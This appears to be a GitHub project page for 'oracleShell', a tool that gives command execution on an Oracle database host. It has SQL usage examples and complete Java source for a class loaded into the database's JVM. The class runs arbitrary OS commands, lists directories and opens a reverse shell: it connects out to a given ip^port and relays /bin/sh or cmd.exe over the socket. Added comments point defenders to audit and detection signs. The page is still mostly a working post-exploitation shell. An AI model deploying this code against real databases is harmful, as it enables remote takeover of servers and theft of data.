https://github.com/jas502n/oracleShell
oracleShell oracle 数据库命令执行
测试环境-DBA权限:
SELECT * FROM v$version
Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - Production
PL/SQL Release 11.2.0.1.0 - Production
"CORE 11.2.0.1.0 Production"
TNS for 32-bit Windows: Version 11.2.0.1.0 - Production
NLSRTL Version 11.2.0.1.0 - Production
Function 功能
-- Usage examples from the post. Each statement calls a SQL-visible function
-- run(method, params, encoding) that forwards to Shell.run in Shell.java; the
-- definition of that SQL wrapper is not shown on this page.
-- For reviewers: these statements are the tool's query-level signature. A
-- SELECT of run('exec' | 'list' | 'getCurrentDir' | 'connectBack', ...) FROM dual
-- in an audit trail or SQL trace indicates this shell is installed and in use.

-- Command execution: runs an OS command on the database host and returns its output.
select run('exec', 'whoami', 'UTF-8') from dual;

-- File management: returns a listing of the given directory on the database host.
select run('list', '/usr', 'UTF-8') from dual;

-- Get the current path: returns the absolute path that Shell.getCurrentDir resolves.
select run('getCurrentDir', '', 'UTF-8') from dual;

-- Reverse shell: the params value is 'ip^port'; the database host opens an
-- outbound TCP connection to that endpoint. The address here is a private
-- (RFC 1918) one, presumably from the author's test setup.
select run('connectBack', '172.17.0.3^8989', 'UTF-8') from dual;
Shell.java
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.io.OutputStreamWriter;
import java.net.Socket;
import java.util.Date;

/**
 * Exposes OS command execution, directory listing, working-directory lookup
 * and an outbound interactive shell through one static entry point,
 * {@link #run(String, String, String)}.
 *
 * <p>The usage on this page calls it from SQL as {@code select run(...) from dual},
 * so the class is presumably loaded into the database's embedded JVM behind a
 * call specification; the loading steps and the wrapper are not shown here.
 *
 * <p>Notes for reviewers and defenders:
 * <ul>
 *   <li>Every operation runs with the OS identity of the process hosting the
 *       JVM (the database server process, in the usage shown).</li>
 *   <li>Observable artefacts: child processes of the database server (arbitrary
 *       commands, {@code /bin/sh} or {@code cmd.exe}), an outbound TCP
 *       connection from the database host, and Java source/class objects plus
 *       a function named {@code run} in a schema that should not own them.</li>
 *   <li>In Oracle's JVM, process execution, file access and sockets are gated
 *       by Java permissions granted through {@code DBMS_JAVA.GRANT_PERMISSION}
 *       and visible in {@code DBA_JAVA_POLICY}. Keeping the DBA role and those
 *       grants restricted and audited, and filtering egress from database
 *       hosts, removes the preconditions this class depends on.</li>
 * </ul>
 */
public class Shell extends Object {
    /**
     * Dispatches to one of the four operations by name (case-insensitive).
     *
     * @param methodName "exec", "list", "getCurrentDir" or "connectBack"
     * @param params     command line for "exec", directory path for "list",
     *                   "ip^port" for "connectBack"; ignored by "getCurrentDir"
     * @param encoding   passed through to exec/list
     * @return the operation's text result, or "unkown methodName" (sic) when
     *         the name matches none of the four
     */
    public static String run(String methodName, String params, String encoding) {
        String result = "";
        if (methodName.equalsIgnoreCase("exec")) {
            result = Shell.exec(params, encoding);
        } else if (methodName.equalsIgnoreCase("list")) {
            result = Shell.list(params, encoding);
        } else if (methodName.equalsIgnoreCase("getCurrentDir")) {
            result = Shell.getCurrentDir();
        } else if (methodName.equalsIgnoreCase("connectBack")) {
            // params is split at the first '^': text before it is the host,
            // text after it is parsed as the integer port.
            String ip = params.substring(0, params.indexOf("^"));
            String port = params.substring(params.indexOf("^") + 1);
            result = Shell.connectBack(ip, Integer.parseInt(port));
        } else {
            result = "unkown methodName";
        }
        return result;
    }

    /**
     * Runs {@code cmd} as a child process of the hosting JVM and returns its
     * output as text.
     *
     * @param cmd      command line handed to {@code Runtime.exec}
     * @param encoding defaulted to "utf-8" when null or empty; not referenced
     *                 again in this method (the reader below is created
     *                 without a charset argument)
     * @return stdout lines when the exit value is 0, otherwise stderr lines,
     *         each followed by "\n"; exception messages are appended to the
     *         result instead of being thrown
     */
    public static String exec(String cmd, String encoding) {
        String result = "";
        if (encoding == null || encoding.equals("")) {
            encoding = "utf-8";
        }
        Process p;
        try {
            // Spawns the OS process; this is the child-process event that
            // host-level monitoring of the database server would record.
            p = Runtime.getRuntime().exec(cmd);
            try {
                // Blocks until the child exits; output is read only afterwards.
                p.waitFor();
            } catch (InterruptedException e) {
                result += e.getMessage();
                e.printStackTrace();
            }
            InputStream fis;
            // Exit value selects which stream is returned to the caller.
            if (p.exitValue() == 0)
                fis = p.getInputStream();
            else
                fis = p.getErrorStream();
            InputStreamReader isr = new InputStreamReader(fis);
            BufferedReader br = new BufferedReader(isr);
            String line = null;
            while ((line = br.readLine()) != null) {
                result += line + "\n";
            }
        } catch (IOException e) {
            result += e.getMessage();
        }
        return result;
    }

    /**
     * Returns a text listing of the entries directly under {@code path}.
     *
     * @param path     directory to enumerate on the host file system
     * @param encoding defaulted to "utf-8" when null or empty; not referenced
     *                 again in this method
     * @return one line per entry: last-modified date, a "&lt;DIR&gt;" marker for
     *         directories, size (KB, or bytes when under 1 KB) for files, and
     *         the entry name
     */
    public static String list(String path, String encoding) {
        String result = "";
        if (encoding == null || encoding.equals("")) {
            encoding = "utf-8";
        }
        File file = new File(path);
        File[] items = file.listFiles();
        for (int i = 0; i < items.length; i++) {
            File item = items[i];
            String type = item.isDirectory() ? "<DIR>" : " ";
            // Integer division: files smaller than 1024 bytes yield "0KB",
            // which the next statement replaces with an exact byte count.
            String size = item.isDirectory() ? " " : item.length() / 1024 + "KB";
            if (size.equals("0KB"))
                size = item.length() + "Byte";
            String date = new Date(item.lastModified()).toLocaleString();
            result += date + " " + type + " " + size + " " + item.getName() + "\n";
        }
        return result;
    }

    /**
     * Returns the absolute path that an empty relative path resolves to,
     * i.e. the working directory of the hosting process.
     *
     * @return the absolute path, or "" if resolving it threw an exception
     */
    public static String getCurrentDir() {
        String result = "";
        File directory = new File("");
        try {
            result = directory.getAbsolutePath();
        } catch (Exception e) {
            // Swallowed: the caller receives the empty string.
        }
        return result;
    }

    /**
     * Opens a TCP connection from the host to {@code ip:port}, starts the
     * platform command interpreter, and relays data between the two.
     *
     * <p>Detection-relevant behaviour: the connection is outbound from the
     * database host, and the interpreter ({@code /bin/sh}, or {@code cmd.exe}
     * when os.name contains "windows") is started as a child of the hosting
     * process.
     *
     * @param ip   remote host to connect to
     * @param port remote TCP port
     * @return always "^OK^"; failures to connect or to start the process are
     *         swallowed, so the return value does not indicate success
     */
    public static String connectBack(String ip, int port) {
        // Thread that copies characters from one stream to another until the
        // source reaches end of stream or an exception occurs.
        class StreamConnector extends Thread {
            // sp: stream read from; gh: stream written to.
            InputStream sp;
            OutputStream gh;

            StreamConnector(InputStream sp, OutputStream gh) {
                this.sp = sp;
                this.gh = gh;
            }

            public void run() {
                BufferedReader xp = null;
                BufferedWriter ydg = null;
                try {
                    xp = new BufferedReader(new InputStreamReader(this.sp));
                    ydg = new BufferedWriter(new OutputStreamWriter(this.gh));
                    char buffer[] = new char[8192];
                    int length;
                    // Flushes after every chunk so data is forwarded as it arrives.
                    while ((length = xp.read(buffer, 0, buffer.length)) > 0) {
                        ydg.write(buffer, 0, length);
                        ydg.flush();
                    }
                } catch (Exception e) {
                    // Swallowed: any I/O error simply ends the relay.
                }
                try {
                    if (xp != null)
                        xp.close();
                    if (ydg != null)
                        ydg.close();
                } catch (Exception e) {
                    // Swallowed: close failures are ignored.
                }
            }
        }
        try {
            String ShellPath;
            // Interpreter is chosen from the os.name system property.
            if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
                ShellPath = new String("/bin/sh");
            } else {
                ShellPath = new String("cmd.exe");
            }
            Socket socket = new Socket(ip, port);
            Process process = Runtime.getRuntime().exec(ShellPath);
            // Two relay threads: process output -> socket, socket -> process input.
            // Both run in the background; this method returns without waiting.
            (new StreamConnector(process.getInputStream(), socket.getOutputStream())).start();
            (new StreamConnector(socket.getInputStream(), process.getOutputStream())).start();
        } catch (Exception e) {
            // Swallowed: connection or process-start failures are not reported.
        }
        return "^OK^";
    }
}
参考链接:
rebeyond-oracleShell.jar